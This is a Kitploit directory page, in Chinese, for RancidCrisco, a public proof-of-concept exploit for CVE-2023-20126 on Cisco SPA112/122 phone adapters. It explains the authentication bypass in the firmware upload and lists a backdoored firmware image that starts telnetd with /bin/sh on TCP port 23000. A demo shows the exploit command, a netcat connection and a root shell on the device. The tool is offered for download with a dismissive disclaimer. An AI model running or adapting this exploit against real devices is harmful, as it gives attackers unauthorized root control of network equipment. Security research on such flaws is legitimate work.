Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RancidCrisco — 针对 CVE-2023-20126 的概念验证利用,目标为 Cisco SPA 电话适配器。上传恶意固件以通过 telnetd 在 23000/tcp 端口获取 root shell。 | Kitploit
工具/GitHubGitHub/fullspectrumdev/rancidcrisco
嵌入式系统安全漏洞分析漏洞利用渗透测试硬件与物联网安全红队远程访问工具固件分析
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

针对 CVE-2023-20126 的概念验证利用,目标为 Cisco SPA 电话适配器。上传恶意固件以通过 telnetd 在 23000/tcp 端口获取 root shell。

查看仓库
242173年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RancidCrisco

CVE-2023-20126 的最小可行 PoC

这是初始版本。它可用,但属于“最简单情况”的利用。

已在 SPA112/SPA122 上测试并生效 —— SPA232D 需要不同的固件镜像。

在 TCP 23000 端口提供 root shell。

我仍需清理用于编辑固件的工具链,可能会将其放在另一个仓库中。该工具链主要基于 @BigNerd95 的工作,但针对 SPA112/122 固件文件做了少量修改。

演示

root@kitploit:~
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

文件

  • fwupload.py - 固件镜像上传器,通过简单地不发送任何认证信息来绕过认证,利用 CVE-2023-20126。接受两个参数:设备 Web UI 的 URL 和要上传的固件文件。
  • telnet-23000.bin - 概念验证恶意固件镜像,会启动 telnetd -l /bin/sh -p 23000,在 TCP 23000 端口提供 root shell。基于 bignerd95 的工作。

许可证

WTFPL.

缺陷

请使用 git issue。

免责声明

如果这东西把你的设备变砖了,我概不负责。
那是你的问题。
我也是花了一个晚上才拼凑出这个带后门的固件。
另外,你为什么不按照文章指导自己构建带后门的固件呢?

下载工具